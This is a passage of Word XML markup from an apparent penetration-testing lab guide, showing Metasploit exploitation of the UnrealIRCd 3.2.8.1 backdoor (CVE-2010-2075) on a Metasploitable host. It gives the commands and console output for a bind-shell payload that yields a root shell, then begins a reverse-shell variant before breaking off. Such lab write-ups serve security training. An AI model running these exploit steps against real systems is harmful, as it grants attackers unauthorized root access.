    <w:p w14:paraId="528F3129" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  hdm &lt;x@hdm.io&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DC789" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABCC436" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Available targets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C0259C" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646F8AEA" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26312A85" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  0   Automatic Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738FF4A" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A6A4F4" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Basic options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44131422" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF840FB" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E1B4DA" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  RHOST                   yes       The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE3D69A" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  RPORT  6667             yes       The target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ACAFC1" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DF68D6" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5BEE5" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Space: 1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79393945" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2357036E" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2B5412" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  This module exploits a malicious backdoor that was added to the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054530D3" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Unreal IRCD 3.2.8.1 download archive. This backdoor was present in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6ED2E9" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189E20B2" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  2010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558FD4C" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F9FBAA" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E38854C" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  https://cvedetails.com/cve/CVE-2010-2075/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495E7499" w14:textId="77777777" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  OSVDB (65445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F70153E" w14:textId="47ABF011" w:rsidR="000E4A77" w:rsidRDefault="000E4A77" w:rsidP="000E4A77">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF65BF" w14:textId="77777777" w:rsidR="00064F80" w:rsidRDefault="00064F80" w:rsidP="003A21A1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="238CC770" w14:textId="71A172C6" w:rsidR="00324ED4" w:rsidRDefault="000E4A77" w:rsidP="003A21A1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:r w:rsidR="004948E8">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>show payloads</w:t>
      </w:r>
      <w:r w:rsidR="004948E8">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00064F80">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00064F80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>display the payload</w:t>
      </w:r>
      <w:r w:rsidR="005A1039">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that are available for this exploit and choose the bind perl. Then, set the</w:t>
      </w:r>
      <w:r w:rsidR="00324ED4">
        <w:t xml:space="preserve"> options and run the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBE00A" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set PAYLOAD cmd/unix/bind_perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5EBCFF" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD =&gt; cmd/unix/bind_perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8542B4" w14:textId="71B3486B" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set RHOST </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065CB27C" w14:textId="1ABE5B9B" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RHOST =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37F047" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5609943B" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48887D5D" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373E4223" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A7BFB06" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A0BDE" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668612B2" w14:textId="3A3B5A7E" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   RHOST  </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    yes       The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408828B5" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   RPORT  6667             yes       The target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428E6CC3" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CEF59D7" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3556879D" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload options (cmd/unix/bind_perl):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D6B46" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59294315" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF50A0" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C4D55A" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LPORT  4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7139C59E" w14:textId="5C6786F9" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   RHOST  </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    no        The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F3C21" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70929008" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41AC7F23" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119641DA" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C68FD65" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CDE42E" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7A668" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   Automatic Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377BAA0" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433F539B" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F774616" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC89F98" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249F6FC0" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Started bind handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138ED0F3" w14:textId="4D4D6C96" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:6667 - Connected to </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:6667...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F2B698" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253C786" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231A4582" w14:textId="2548AEE7" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:6667 - Sending backdoor command...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D25C9C" w14:textId="478A5DCB" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Command shell session 2 opened (</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:45689 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:4444) at 2018-06-26 16:58:35 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC09180" w14:textId="424449D6" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D1766D" w14:textId="3E6D869A" w:rsidR="00324ED4" w:rsidRPr="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB3B78" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DE42BA" w14:textId="77777777" w:rsidR="007A6C6D" w:rsidRDefault="007A6C6D" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2766B4" w14:textId="14876945" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Same thing but using a reverse shell instead and upgrading the shell to a TTY Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF7770" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC60130" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD =&gt; cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D28983C" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6964EAC5" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8F7183" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02A8A7" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0CBE07" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2BE3A" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A88CF1" w14:textId="1E6D7F40" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   RHOST  </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    yes       The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33B32D" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   RPORT  6667             yes       The target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D6C9C" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EC7D67" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C93C55C" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload options (cmd/unix/reverse):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C075EAB" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C7B6E3" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C00A8B" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5361356F" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   LHOST                   yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534BD357" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LPORT  4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF79FA7" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB4847D" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544B7970" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7EA935" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
